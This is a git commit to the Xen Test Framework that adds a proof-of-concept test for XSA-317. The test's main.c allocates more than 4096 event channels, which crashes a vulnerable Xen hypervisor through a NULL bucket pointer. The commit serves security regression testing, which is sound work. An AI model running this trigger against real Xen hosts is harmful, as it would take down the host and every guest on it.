From: Julien Grall Date: Tue, 7 Jul 2020 10:54:49 +0000 (+0100) Subject: XSA-317 PoC X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=ba5923110c2f562170b82f955d9ace70f6a4a8e2;p=xtf.git XSA-317 PoC Signed-off-by: Julien Grall Signed-off-by: Andrew Cooper --- diff --git a/docs/all-tests.dox b/docs/all-tests.dox index 15eeccd..8eed0cf 100644 --- a/docs/all-tests.dox +++ b/docs/all-tests.dox @@ -150,6 +150,8 @@ states. @subpage test-xsa-316 - Bad error path in GNTTABOP_map_grant. +@subpage test-xsa-317 - Incorrect error handling in event channel port allocation. + @section index-utility Utilities diff --git a/include/xen/event_channel.h b/include/xen/event_channel.h index 62ee95a..bef0f46 100644 --- a/include/xen/event_channel.h +++ b/include/xen/event_channel.h @@ -1,12 +1,22 @@ #ifndef XEN_PUBLIC_EVENT_CHANNEL_H #define XEN_PUBLIC_EVENT_CHANNEL_H +#include + #define EVTCHNOP_send 4 +#define EVTCHNOP_alloc_unbound 6 #define EVTCHNOP_init_control 11 #define EVTCHNOP_expand_array 12 typedef uint32_t evtchn_port_t; +struct evtchn_alloc_unbound { + /* IN parameters. */ + domid_t dom, remote_dom; + /* OUT parameters. */ + evtchn_port_t port; +}; + struct evtchn_init_control { /* IN parameters. */ uint64_t control_gfn; diff --git a/include/xtf/xenbus.h b/include/xtf/xenbus.h index 3ed77d5..76fa739 100644 --- a/include/xtf/xenbus.h +++ b/include/xtf/xenbus.h @@ -2,6 +2,7 @@ #define XTF_XENBUS_H #include +#include #include #include diff --git a/tests/xsa-317/Makefile b/tests/xsa-317/Makefile new file mode 100644 index 0000000..f930b03 --- /dev/null +++ b/tests/xsa-317/Makefile @@ -0,0 +1,11 @@ +include $(ROOT)/build/common.mk + +NAME := xsa-317 +CATEGORY := xsa +TEST-ENVS := $(ALL_ENVIRONMENTS) + +TEST-EXTRA-CFG := extra.cfg.in + +obj-perenv += main.o + +include $(ROOT)/build/gen.mk diff --git a/tests/xsa-317/extra.cfg.in b/tests/xsa-317/extra.cfg.in new file mode 100644 index 0000000..0cae09a --- /dev/null +++ b/tests/xsa-317/extra.cfg.in @@ -0,0 +1 @@ +max_event_channels=4096 diff --git a/tests/xsa-317/main.c b/tests/xsa-317/main.c new file mode 100644 index 0000000..8d52746 --- /dev/null +++ b/tests/xsa-317/main.c @@ -0,0 +1,60 @@ +/** + * @file tests/xsa-317/main.c + * @ref test-xsa-317 + * + * @page test-xsa-317 XSA-317 + * + * Advisory: [XSA-317](https://xenbits.xen.org/xsa/advisory-317.html) + * + * This vulnerability affects: + * - HVM and 32-bit PV guests allowed to use more than 1024 event channels. + * - 64-bit guests allowed to use more than 4096 event channels. + * + * The testcase will try to allocate more than 4096 event channels. On + * vulnerable platform, Xen will fall over a NULL evtchn bucket pointer. + * + * @see tests/xsa-317/main.c + */ +#include + +const char test_title[] = "XSA-317 PoC"; + +void test_main(void) +{ + unsigned int i; + struct evtchn_alloc_unbound ub = { + .dom = DOMID_SELF, + .remote_dom = 0, + }; + + /* + * Create more event channels than the 4096 ABI limit. A fixed Xen, or + * not vulnerable configuration, should fail with -ENOSPC eventually. + */ + for ( i = 0; i < 4100; ++i ) + { + int rc = hypercall_event_channel_op(EVTCHNOP_alloc_unbound, &ub); + + if ( rc == -ENOSPC ) + break; + + if ( rc ) + return xtf_error("Error: Unexpected alloc_unbound error %d\n", rc); + } + + /* + * If Xen is still alive, it didn't fall over a NULL evtchn bucket + * pointer. + */ + xtf_success("Success: Not vulnerable to XSA-317\n"); +} + +/* + * Local variables: + * mode: C + * c-file-style: "BSD" + * c-basic-offset: 4 + * tab-width: 4 + * indent-tabs-mode: nil + * End: + */